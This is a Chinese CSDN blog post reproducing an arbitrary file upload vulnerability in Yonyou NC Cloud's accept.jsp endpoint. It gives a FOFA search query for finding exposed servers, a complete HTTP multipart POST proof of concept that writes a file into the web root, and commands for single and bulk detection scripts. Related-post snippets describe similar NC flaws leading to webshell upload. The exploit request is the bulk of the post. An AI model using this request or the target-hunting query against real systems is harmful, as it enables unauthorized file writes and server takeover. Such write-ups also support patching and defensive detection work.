用友NC Cloud accept.jsp任意文件上传漏洞

最新推荐文章于 2024-04-21 00:15:00 发布
最新推荐文章于 2024-04-21 00:15:00 发布
阅读量393 收藏 1
点赞数
文章标签: java 开发语言 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CommputerMac/article/details/134298160
版权

一、漏洞描述

NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。

二、网络空间搜索引擎查询

fofa查询

icon_hash="1085941792"

三、漏洞复现

POC

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 324
Content-Type: multipart/form-data; boundary=ac1485f11aa5441defff4ab45b7fb177

--ac1485f11aa5441defff4ab45b7fb177
Content-Disposition: form-data; name="upload"; filename="check.txt"
Content-Type: text/plain

There is a vulnerability in this website
--ac1485f11aa5441defff4ab45b7fb177
Content-Disposition: form-data; name="fname"

\webapps\nc_web\check.txt
--ac1485f11aa5441defff4ab45b7fb177--

上传成功,返回如下:

访问

http://ip:port/check.txt

查看上传内容

四、漏洞检测

单个检测

python AcceptUpload.py -u url

批量检测

python AcceptUpload.py -f filename

关注微信公众号 网络安全透视镜 回复 20231108 获取批量检测脚本

为赋新词强说愁
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
用友NC Cloud uploadChunk任意文件漏洞复现 [附POC]
薛定谔嘚喵博客
11-22 318
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。用友NC Cloud uploadChunk接口存在任意文件漏洞
用友NC-Cloud全版本任意文件
初岄的博客
10-20 492
用友NC-Cloud最近爆出存在全版本任意文件漏洞的问题。现在已经确认了这个漏洞可以被攻击者利用,目前找不到此漏洞适用的最低版本。攻击者可以通过该漏洞任意文件至服务器,并以此将webshell上至服务器,从而获得服务器的命令执行权限。
漏洞复现】用友NC-Cloud ConfigResourceServlet 反序列化漏洞
qq_67810151的博客
04-16 429
用友NC 存在反序列化漏洞,未授权的攻击者可以通过该漏洞执行任意命令,从而控制服务器。
用友NC-Cloud uploadChunk 任意文件漏洞
CommputerMac的博客
10-17 991
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。uploadChunk文件存在任意文件漏洞,攻击者通过此漏洞可实现上木马文件,控制服务器。
用友NC Cloud saveImageServlet/doPost接口存在任意文件漏洞
wan___she__pi的博客
04-21 523
用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。同时,用友NC Cloud 还支持多终端访问,适应各种不同的设备和工作场景,方便用户灵活办公和协作。
用友NC-Cloud_importhttpscer接口存在任意文件漏洞(含批量验证poc)(1)
m0_60750088的博客
04-16 353
披露时间:2024-04-05。影响版本:用友NC Cloud
用友 NC Cloud jsinvoke 任意文件
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 880
用友 NC Cloud 中存在 jsinvoke 接口的任意文件漏洞,攻击者可以通过利用此漏洞向系统上任意恶意文件
用友NC任意文件漏洞利用工具
04-14
用友NC任意文件漏洞利用工具,用友NC6.5的某个页面,存在任意文件漏洞漏洞成因在于上文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
NC Cloud 2021.05 全产品培训 - 应收应付
06-01
收付单据 转移并账 协同管理 核销处理 坏账管理 催款管理 汇兑损益 期末处理 查询
用友NC操作流程.pdf
04-05
用友NC操作流程详解》 用友NC是一款先进的企业资源计划系统,广泛应用于大型企业的财务管理、供应链管理、生产制造等多个领域。其操作流程严谨且细致,涉及到多个关键环节,确保了系统的安全性和效率。以下将详细...
用友nc数据字典.xls
02-19
用友nc数据字典.xls
NC Cloud技术文档及OpenAPI案例文档
03-09
NC Cloud技术文档及OpenAPI案例文档
漏洞复现】用友NC Cloud uploadChunk任意文件漏洞
失心少年
11-22 422
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。漏洞链接:http://127.0.0.1/ncchr/pm/fb/attachment/uploadChunk?
NC Cloud uploadChunk文件漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-20 379
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件漏洞。没有人规定,一朵花一点要成长为向日葵或者玫瑰。
用友 ufida-nc 文件读取漏洞
qq_36334672的博客
02-05 654
用友移动系统管理portal接口存在任意文件读取,攻击者可在无需登录的情况下进行任意文件读取。
漏洞复现--用友NC accept.jsp任意文件
qq_53003652的博客
11-07 558
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)。用友NC accept.jsp处存在任意文件漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。上成功,并且成功解析,可上免杀马获得服务器权限。访问/test.jsp
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-12 875
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞,附带自己写的poc脚本
漏洞复现--用友NC-Cloud uploadChunk 任意文件
qq_53003652的博客
10-18 923
NC Cloud是指用友公司推出的大型企业数字化平台。支持公有云、混合云、专属云的灵活部署模式。该产品uploadChunk文件存在任意文件漏洞
用友NC任意文件漏洞复现
热门推荐
Adminxe的博客
12-14 1万+
0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件漏洞漏洞成因在于上文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上任意文件执行命令。 0x01 漏洞原理 根据文档,FileRece..
用友nccloud系统架构
最新发布
06-02
后端主要是指用友NC Cloud 的数据存储层,它包含了数据库、文件存储、对象存储等多个组件。用友NC Cloud 的后端采用了分布式存储架构,通过数据库的读写分离和数据分片技术来提高系统的性能和可伸缩性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值